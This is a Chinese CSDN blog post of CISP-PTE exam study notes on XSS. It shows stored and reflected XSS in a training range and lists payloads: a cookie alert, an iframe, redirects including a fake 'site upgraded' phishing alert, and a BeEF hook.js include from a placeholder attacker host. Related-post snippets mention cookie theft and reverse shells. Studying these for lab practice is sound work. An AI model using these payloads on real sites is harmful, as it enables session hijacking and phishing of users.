PTE_XSS(Day2)

最新推荐文章于 2023-02-17 18:01:35 发布
最新推荐文章于 2023-02-17 18:01:35 发布
阅读量257 收藏
点赞数
分类专栏: 渗透学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CHUNJIUJUN/article/details/119563382
版权

JS消息框分为以下三种:

alert("文本")

confirm("文本")

<script>var r=confirm("你选择了什么");if(r==true){alert('你选择了确认');}else{alert('你选择了取消');}</script>

 

 

 prompt("文本","默认值")

 XSS存储型注入

 这里发现单引号被过滤了,所以用 / 或者双引号代替单引号

重定向

 <script>window.location="http://121.5.23.168"</script>

跳转成功

反射型XSS攻击

构造payload

http://d9fd2486.yunyansec.com/src/xss_1.php?key=%3Cscript%3Ewindow.location%3D%22http%3A%2F%2F121.5.23.168%2F%22%3C%2Fscript%3E#

别人点击以后会进入新的地址

原:

构造以后:

 原理就是诱导用户点击,钓鱼

 

XSS攻击脚本

弹窗警告
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>

页面嵌套
<iframe> src=http://www.baidu.com width=10 height=10 border=10 </iframe>

重定向
<script>window.location="http://www.baidu.com"</script>

弹窗警告并重定向
<script>alert('网站升级更新,请移步新版本');location.href="https://www.baidu.com"</script>

访问恶意代码
<script src="http://BeEF_IP:3000/hook.js"></script>

tacooo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CISP-PTE XSS进阶实战+Bypass绕过技巧
beirry的博客
06-13 1296
通过上篇文章,我们对xss的三种类型以及利用方法有一个大概的了解了,那么接下来我们会讲讲该如何利用xss获取个人信息。还是以DVWA靶场,获取cookie为例子: 这里用了kali来做为我们接收cookie的服务器,需要先在kali上开启apache。 受害机能访问到kali即可。 跳转到/var/www/html/下,新建一个php文件,文件内容如下: 返回到html目录下,给html一个777权限,防止实验失败。 打开dvwa反射型页面,用low等级测试。 POC我们在上一章已经验证过了,就不再验
模拟cisp-pte 第四题 命令执行
小明师傅博客
06-14 3002
输入127.0.0.1 | find / -name “key.php” 找到文件位置,php文件不可以直接读 tac /app/key.php 用tac读php文件 成功
CISP-PTE XSS基础
beirry的博客
06-02 969
同源策略 百度:同源策略(Same origin policy)是一种约定,它是浏览器最核心也最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能都会受到影响。可以说Web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现。 同源的意思是指域名,协议,端口相同。不同源的客户端脚本(JavaScript,actionscript)再没明确授权的情况下,不能读写对方的资源。 如果两个页面的协议,端口和域名都相同,则两个页面具有相同的源。 以百度为例:https://www.baidu.co
cisp-pte考试靶场及通关攻略下载
潇湘信安的博客
02-17 2841
周末抽空找了几个CISP-PTE考试靶场和一份通关攻略文档,并将这份攻略整理成了PDF文档。
xss绕过字符过滤_【渗透实例】记录一次XSS渗透过程
weixin_32493541的博客
01-04 879
0x01 找到存在XSS的位置没什么技巧,见到框就X,功夫不负有心人,在目标网站编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。使用的XSS代码:<img src=1 onerror=alert(1)>0x02 构造XSS代码连接到XSS平台XSS平台给我们的XSS代码是这样的:</tExtArEa>'"><sCRiPt sRC=https...
CISP-PTE_windows操作系统安全V2.0.pptx
10-22
CISP-PTE_windows操作系统安全V2.0 Windows 操作系统安全是计算机安全的重要组成部分。该领域的知识体系主要包括账户安全、文件系统安全、日志分析、账户风险与安全策略等几个方面。 账户安全是 Windows 操作系统...
pte_docker.zip
02-23
CISP-PTE真题模拟题docker环境
CISP-PTE_linux操作系统安全V2.0.pptx
10-22
2. **用户信息文件** `passwd`文件以文本格式存储用户信息,全局可读,但密码以加密形式存在。每个条目包含用户名、密码散列、用户ID、组ID、用户信息、家目录和默认Shell。`shadow`文件则只对root用户可读写,...
mem.rar_V2
09-24
6. **物理地址到线性地址转换**:通过页全局目录(PGD)、页中间目录(PMD)、页表项(PTE)等数据结构,内核将物理地址映射到进程的线性地址,实现虚拟内存。 7. **交换机制**:当物理内存不足时,Linux内核会使用...
CISP-PTE渗透测试工程师指南_cisp渗透测试_注册渗透测试工程师指南_cisp-pte_
10-04
注册渗透测试工程师指南,想要考PTE,有需要的可以下载
pte练习——34051(sql)、34061、34214(代码)、34223(文件包含)、34224(xss)、34234(代码)、34415(xss
haoaaao的博客
02-10 2949
一、34051(sql注入) 1、输入用户名和特殊字符密码,发现个别字符被屏蔽,说明用户密码中存在sql注入漏洞。 2、想办法闭合语句,发现关键词大多数被屏蔽,尝试用or闭合,or被屏蔽,使用多写或大写可以绕过: 二、34061(sql注入) 1、题中给出查询语句,想办法闭合语句: 2、使用sql语句查询: (1)order by测试列数为7: (2)union select联...
什么是XSS漏洞?
zxのdream
10-29 979
XSS漏洞
Web_信息搜集(DAY2
CHUNJIUJUN的博客
07-27 3644
KALI whatweb功能 域名查询 爱站:dns.aizhan.com 站长之家 :tool.chinaz.com whois命令 子域名查询 http://tool.chinaz.com/subdomain 备案号查询 tianyancha.com 主机信息搜索 主机开放的端口和服务 主机的操作系统识别 常见端口 TCP端口(静态端口) TCP 0= Reserved TCP 1=TCP Port Service Multiplexer TCP 2..
phar / zip 伪协议的应用wp
CHUNJIUJUN的博客
08-13 1676
查看源码 显示只能上传txt文件 上传一个txt文件试试 上传成功 这里我们退回主页面,发现有一个LFI here,意思是:这里是文件包含,点进去发现页面和源码什么都没有 退回主页面查看主页面源码,发现有提示 lfi.txt 我们将刚刚的 lfi.php 改成 lfi.txt 试一试,发现有内容,意思是给file传了一次参数,给file传的参数不能为空,无论file名是什么,都在file名后加一个 .php 后缀,注释的意思是值允许php文件被包含 ...
XSS过滤实操
CHUNJIUJUN的博客
08-10 1052
第一关——直接输出 第二关——value 第二关需要闭合value,看源码应该是用双引号闭合的,但是发现不行,于是用单引号闭合试了试竟然可以,可能是环境问题吧。。。 第三关——xss过滤简单 input没有闭合,而且alert没了被过滤了 成功 第四关——xss简单过滤 报错了,说明我们输入的某些语句触发了报错,一点一点删除语句尝试看看哪里错了 发现删除alert()函数不报错了,说明程序设置了使用alert报错,我们换...
Web——网络安全之通信安全_DDoS(DAY3)
CHUNJIUJUN的博客
07-19 760
网络通信域名 1、域名简介 2、URL 网络通信DDoS攻击 1、DDoS简介 2、DDos攻击原理 3、DDoS攻击形式 DDoS实战参考 使用Torshammer执行DDoS攻击 - 简书 (jianshu.com) https://www.jianshu.com/p/11bfbfaa7dfb?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_so...
PTE_本地文件包含wp
CHUNJIUJUN的博客
08-13 696
进入题目,提示答案在根目录下的key.php文件中,所以我们最后只需要cat该文件应该就有key了 开始答题,页面上没有什么有用信息 查看该页面的源码,也没找到什么有用信息 我们发现网页是使用文件包含的方法打开了view.html,我们可以访问view.html,然后查看源码 发现用Hello传了一次参数,第四行进行了base64加密 进行base64解密,发现是用POST方式以z0传参 综上,我们一共需要传两次参数,第一次是Hello需要传参,这里随便给He
反弹shell_DC-3_wp
CHUNJIUJUN的博客
08-20 663
反弹shell原理与实现 (转自反弹shell原理与实现 - iouwenbo - 博客园 (cnblogs.com)) 什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我
PTE_远程文件包含wp
CHUNJIUJUN的博客
08-13 550
一堆看不懂的东西,发现并没有本地文件包含的点 试试远程文件包含,发现是可以的 从远程服务器远程文件包含一个写了一句话木马的 1.txt 发现 txt 被双写了,应该是服务器端自动添加了一个 .txt 后缀,所以我们去掉我们的后缀 成功写入,执行命令,这里的 c 是我们一句话木马中自己写的哦 显示 get it 查看源码,发现key值 ...
pte_val(**pte);
最新发布
12-28
pte_val(**pte)是一个函数调用表达式,它的含义是获取一个二级页表项(Page Table Entry,简称PTE)的值。具体来说,它是通过两次解引用操作来获取到pte指针所指向的二级页表项的值。 首先,我们来解释一下这个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值